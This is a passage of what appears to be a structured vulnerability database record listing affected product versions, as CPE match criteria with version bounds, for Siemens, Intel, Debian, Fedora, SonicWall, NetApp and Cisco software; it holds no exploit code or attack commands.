ia\":\"cpe:2.3:a:siemens:energyip:8.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4C08D302-EEAC-45AA-9943-3A5F09E29FAB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip:9.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D53BA68C-B653-4507-9A2F-177CF456960F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip_prepay:3.7:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1F0C3D5E-579F-42C6-9D8C-37969A1D17D2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip_prepay:3.8:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2C16C460-9482-4A22-92AC-1AE0E87D7F28\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:gma-manager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"8.6.2j-398\",\"matchCriteriaId\":\"0E180527-5C36-4158-B017-5BEDC0412FD6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:head-end_system_universal_device_integration_system:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AFDADA98-1CD0-45DA-9082-BFC383F7DB97\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:industrial_edge_management:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E33D707F-100E-4DE7-A05B-42467DE75EAC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:industrial_edge_management_hub:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-12-13\",\"matchCriteriaId\":\"DD3EAC80-44BE-41D2-8D57-0EE3DBA1E1B1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:logo\\\\!_soft_comfort:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2AC8AB52-F4F4-440D-84F5-2776BFE1957A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:mendix:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6AF6D774-AC8C-49CA-A00B-A2740CA8FA91\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:mindsphere:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-12-11\",\"matchCriteriaId\":\"6423B1A7-F09F-421A-A0AC-3059CB89B110\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:navigator:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-12-13\",\"matchCriteriaId\":\"48C6A61B-2198-4B9E-8BCF-824643C81EC3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:nx:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BEE2F7A1-8281-48F1-8BFB-4FE0D7E1AEF4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:opcenter_intelligence:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"3.2\",\"matchCriteriaId\":\"C74B9880-FFF9-48CA-974F-54FB80F30D2D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:operation_scheduler:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.1.3\",\"matchCriteriaId\":\"74D1F4AD-9A60-4432-864F-4505B3C60659\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:sentron_powermanager:4.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7ABA5332-8D1E-4129-A557-FCECBAC12827\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:sentron_powermanager:4.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9C3AA865-5570-4C8B-99DE-431AD7B163F1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siguard_dsa:4.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"00E03FB6-37F9-4559-8C86-F203D6782920\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siguard_dsa:4.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"90439591-BA01-4007-A2B6-B316548D4595\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siguard_dsa:4.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E1F3B8B4-4D1B-4913-BD5F-1A04B47F829A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:sipass_integrated:2.80:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"83E77D85-0AE8-41D6-AC0C-983A8B73C831\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:sipass_integrated:2.85:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"02B28A44-3708-480D-9D6D-DDF8C21A15EC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siveillance_command:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"4.16.2.1\",\"matchCriteriaId\":\"2FC0A575-F771-4B44-A0C6-6A5FD98E5134\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siveillance_control_pro:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"6D1D6B61-1F17-4008-9DFB-EF419777768E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siveillance_identity:1.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9772EE3F-FFC5-4611-AD9A-8AD8304291BB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siveillance_identity:1.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CF524892-278F-4373-A8A3-02A30FA1AFF4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siveillance_vantage:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F30DE588-9479-46AA-8346-EA433EE83A5F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:siveillance_viewpoint:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4941EAD6-8759-4C72-ABA6-259C0E838216\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:solid_edge_cam_pro:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5BF2708F-0BD9-41BF-8CB1-4D06C4EFB777\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:solid_edge_harness_design:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2020\",\"matchCriteriaId\":\"0762031C-DFF1-4962-AE05-0778B27324B9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:solid_edge_harness_design:2020:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"96271088-1D1B-4378-8ABF-11DAB3BB4DDC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:solid_edge_harness_design:2020:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"2595AD24-2DF2-4080-B780-BC03F810B9A9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:solid_edge_harness_design:2020:sp2002:*:*:*:*:*:*\",\"matchCriteriaId\":\"88096F08-F261-4E3E-9EEB-2AB0225CD6F3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:spectrum_power_4:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.70\",\"matchCriteriaId\":\"044994F7-8127-4F03-AA1A-B2AB41D68AF5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:spectrum_power_4:4.70:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"A6CB3A8D-9577-41FB-8AC4-0DF8DE6A519C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:spectrum_power_4:4.70:sp7:*:*:*:*:*:*\",\"matchCriteriaId\":\"17B7C211-6339-4AF2-9564-94C7DE52EEB7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:spectrum_power_4:4.70:sp8:*:*:*:*:*:*\",\"matchCriteriaId\":\"DBCCBBBA-9A4F-4354-91EE-10A1460BBA3F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:spectrum_power_7:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.30\",\"matchCriteriaId\":\"12F81F6B-E455-4367-ADA4-8A5EC7F4754A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:spectrum_power_7:2.30:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A5EF509E-3799-4718-B361-EFCBA17AEEF3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:spectrum_power_7:2.30:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"8CA31645-29FC-4432-9BFC-C98A808DB8CF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:spectrum_power_7:2.30:sp2:*:*:*:*:*:*\",\"matchCriteriaId\":\"BB424991-0B18-4FFC-965F-FCF4275F56C5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:teamcenter:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1B209EFE-77F2-48CD-A880-ABA0A0A81AB1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:vesys:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2019.1\",\"matchCriteriaId\":\"72D238AB-4A1F-458D-897E-2C93DCD7BA6C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:vesys:2019.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9778339A-EA93-4D18-9A03-4EB4CBD25459\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:vesys:2019.1:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"1747F127-AB45-4325-B9A1-F3D12E69FFC8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:vesys:2019.1:sp1912:*:*:*:*:*:*\",\"matchCriteriaId\":\"18BBEF7C-F686-4129-8EE9-0F285CE38845\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:xpedition_enterprise:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AD525494-2807-48EA-AED0-11B9CB5A6A9B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:xpedition_package_integrator:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1EDCBF98-A857-48BC-B04D-6F36A1975AA5\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:intel:audio_development_kit:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"099344DD-8AEE-49A0-88A8-691A8A1E651F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:intel:computer_vision_annotation_tool:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"12A06BF8-E4DC-4389-8A91-8AC7598E0009\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:intel:data_center_manager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"5.1\",\"matchCriteriaId\":\"8555F365-2BFD-4A0A-A7D0-1459241758B3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:intel:genomics_kernel_library:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"18989EBC-E1FB-473B-83E0-48C8896C2E96\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:intel:oneapi_sample_browser:-:*:*:*:*:eclipse:*:*\",\"matchCriteriaId\":\"EDE66B6C-25E5-49AE-B35F-582130502222\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:intel:secure_device_onboard:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"22BEE177-D117-478C-8EAD-9606DEDF9FD5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:intel:sensor_solution_firmware_development_kit:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F021E2E7-0D8F-4336-82A6-77E521347C4F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:intel:system_debugger:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1F66B0A2-22C0-41D5-B866-1764DEC12CB2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:intel:system_studio:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FC619106-991C-413A-809D-C2410EBA4CDB\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DEECE5FC-CACF-4496-A3E7-164736409252\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"07B237A9-69A3-4A9C-9DA0-4E06BD37AE73\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FA6FEEC2-9F11-4643-8827-749718254FED\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A930E247-0B43-43CB-98FF-6CE7B8189835\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"80E516C0-98A4-4ADE-B69F-66A772E2BAAA\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"10.0.12\",\"matchCriteriaId\":\"B5BAA8A5-74B3-48EB-8287-302927197A4E\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*\",\"matchCriteriaId\":\"F3E0B672-3E06-4422-B2A4-0BD073AEC2A1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*\",\"matchCriteriaId\":\"3A756737-1CC4-42C2-A4DF-E1C893B4E2D5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*\",\"matchCriteriaId\":\"B55E8D50-99B4-47EC-86F9-699B67D473CE\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netapp:cloud_insights:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"26FCA75B-4282-4E0F-95B4-640A82C8E91C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"197D0D80-6702-4B61-B681-AFDBA7D69067\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netapp:cloud_secure_agent:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F0F202E8-97E6-4BBB-A0B6-4CA3F5803C08\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F1BE6C1F-2565-4E97-92AA-16563E5660A5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netapp:ontap_tools:-:*:*:*:*:vmware_vsphere:*:*\",\"matchCriteriaId\":\"CBCC384C-5DF0-41AB-B17B-6E9B6CAE8065\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:vmware_vsphere:*:*\",\"matchCriteriaId\":\"F3A48D58-4291-4D3C-9CEA-BF12183468A7\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:advanced_malware_protection_virtual_private_cloud_appliance:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.5.4\",\"matchCriteriaId\":\"4E52AF19-0158-451B-8E36-02CB6406083F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:automated_subsea_tuning:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.1.0\",\"matchCriteriaId\":\"CB21CFB4-4492-4C5D-BD07-FFBE8B5D92B6\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:broadworks:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021.11_1.162\",\"matchCriteriaId\":\"97426511-9B48-46F5-AC5C-F9781F1BAE2F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.0.000.115\",\"matchCriteriaId\":\"82306B9F-AE97-4E29-A8F7-2E5BA52998A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.1.000.000\",\"versionEndExcluding\":\"3.1.000.044\",\"matchCriteriaId\":\"4C903C85-DC0F-47D8-B8BE-7A666877B017\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:business_process_automation:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.2.000.000\",\"versionEndExcluding\":\"3.2.000.009\",\"matchCriteriaId\":\"E4C6F9E0-5DCE-431D-AE7E-B680AC1F9332\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloud_connect:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.6\\\\(1\\\\)\",\"matchCriteriaId\":\"52CF6199-8028-4076-952B-855984F30129\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloudcenter:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.10.0.16\",\"matchCriteriaId\":\"622BB8D9-AC81-4C0F-A5C5-C5E51F0BC0D1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloudcenter_cost_optimizer:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"5.5.2\",\"matchCriteriaId\":\"38FB3CE1-5F62-4798-A825-4E3DB07E868F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloudcenter_suite_admin:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"5.3.1\",\"matchCriteriaId\":\"29CDB878-B085-448E-AB84-25B1E2D024F8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cloudcenter_workload_manager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"5.5.2\",\"matchCriteriaId\":\"C25FDA96-9490-431F-B8B6-CC2CC272670E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:common_services_platform_collector:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.9.1.3\",\"matchCriteriaId\":\"51CD9E4C-9385-435C-AD18-6C36C8DF7B65\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:common_services_platform_collector:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.10.0\",\"versionEndExcluding\":\"2.10.0.1\",\"matchCriteriaId\":\"FC0AC4C1-CB06-4084-BFBB-5B702C384C53\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:connected_mobile_experiences:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3871EBD2-F270-435A-B98C-A282E1C52693\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:contact_center_domain_manager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.5\\\\(1\\\\)\",\"matchCriteriaId\":\"8D4DF34B-E8C2-41C8-90E2-D119B50E4E7E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:contact_center_management_portal:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.5\\\\(1\\\\)\",\"matchCriteriaId\":\"C8EF64DA-73E4-4E5E-8F9A-B837C947722E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_data_gateway:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.0.2\",\"matchCriteriaId\":\"66E1E4FC-0B6E-4CFA-B003-91912F8785B2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_data_gateway:3.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1B2390C3-C319-4F05-8CF0-0D30F9931507\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_controller:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.0.1\",\"matchCriteriaId\":\"C154491E-06C7-48B0-AC1D-89BBDBDB902E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_network_controller:3.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1E98EC48-0CED-4E02-9CCB-06EF751F2BDC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_optimization_engine:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.0.1\",\"matchCriteriaId\":\"C569DC2A-CFF6-4E13-A50C-E215A4F96D99\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_optimization_engine:3.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"258A51AC-6649-4F67-A842-48A7AE4DCEE1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_platform_infrastructure:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.0.1\",\"matchCriteriaId\":\"8DC22505-DE11-4A1B-8C06-1E306419B031\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_platform_infrastructure:4.1.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9E31AC54-B928-48B5-8293-F5F4A7A8C293\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.0.1\",\"matchCriteriaId\":\"5B8AE870-6FD0-40D2-958B-548E2D7A7B75\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:3.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"68E7D83B-B6AC-45B1-89A4-D18D7A6018DD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:customer_experience_cloud_agent:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.12.1\",\"matchCriteriaId\":\"17660B09-47AA-42A2-B5FF-8EBD8091C661\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.0.3\",\"matchCriteriaId\":\"FBEF9A82-16AE-437A-B8CF-CC7E9B6C4E44\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:data_center_network_manager:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"11.3\\\\(1\\\\)\",\"matchCriteriaId\":\"843147AE-8117-4FE9-AE74-4E1646D55642\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:data_center_network_manager:11.3\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7EB871C9-CA14-4829-AED3-CC2B35E99E92\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.1.2.8\",\"matchCriteriaId\":\"4FF8A83D-A282-4661-B133-213A8838FB27\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.2.2.0\",\"versionEndExcluding\":\"2.2.2.8\",\"matchCriteriaId\":\"139CDAA5-63E9-4E56-AF72-745BD88E4B49\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_center:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.2.3.0\",\"versionEndExcluding\":\"2.2.3.4\",\"matchCriteriaId\":\"01FD99C4-BCB1-417E-ADCE-73314AD2E857\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:dna_spaces\\\\:_connector:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.5\",\"matchCriteriaId\":\"9031BE8A-646A-4581-BDE5-750FB0CE04CB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:emergency_responder:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"11.5\\\\(4\\\\)\",\"matchCriteriaId\":\"15BED3E2-46FF-4E58-8C5D-4D8FE5B0E527\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:enterprise_chat_and_email:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.0\\\\(1\\\\)\",\"matchCriteriaId\":\"7C950436-2372-4C4B-9B56-9CB48D843045\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"4.1.1\",\"matchCriteriaId\":\"0B61F186-D943-4711-B3E0-875BB570B142\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"12.6\\\\(1\\\\)\",\"matchCriteriaId\":\"2A285C40-170D-4C95-8031-2C6E4D5FB1D4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:finesse:12.6\\\\(1\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3C0F02B5-AA2A-48B2-AE43-38B45532C563\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:fog_director:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"830BDB28-963F-46C3-8D50-638FDABE7F64\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.4.0\",\"matchCriteriaId\":\"54553C65-6BFA-40B1-958D-A4E3289D6B1D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:identity_services_engine:2.4.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"439948AD-C95D-4FC3-ADD1-C3D241529F12\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:integrated_management_controller_supervisor:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.3.2.1\",\"matchCriteriaId\":\"9C2002AE-0F3C-4A06-9B9A-F77A9F700EB2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:intersight_virtual_appliance:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.0.9-361\",\"matchCriteriaId\":\"596A986D-E7DC-4FC4-A776-6FE87A91D7E4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:iot_operations_dashboard:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DD93434E-8E75-469C-B12B-7E2B6EDCAA79\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_assurance_engine:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.0.2\",\"matchCriteriaId\":\"78684844-4974-41AD-BBC1-961F60025CD2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"5.3.5.1\",\"matchCriteriaId\":\"3A00D235-FC9C-4EB7-A16C-BB0B09802E61\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.4\",\"versionEndExcluding\":\"5.4.5.2\",\"matchCriteriaId\":\"C60FDD1B-898E-4FCB-BDE2-45A7CBDBAF4F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.5\",\"versionEndExcluding\":\"5.5.4.1\",\"matchCriteriaId\":\"E7A33E5F-BBC7-4917-9C63-900248B546D9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.6\",\"versionEndExcluding\":\"5.6.3.1\",\"matchCriteriaId\":\"12D98A7C-4992-4E58-A6BD-3D8173C8F2B0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:nexus_dashboard:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.1.2\",\"matchCriteriaId\":\"E2DDC1AF-31B5-4F05-B84F-8FD23BE163DA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:nexus_insights:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.0.2\",\"matchCriteriaId\":\"A4540CF6-D33E-4D33-8608-11129D6591FA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:optical_network_controller:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.1.0\",\"matchCriteriaId\":\"129A7615-99E7-41F8-8EBC-CEDA10AD89AD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:packaged_contact_center_enterprise:*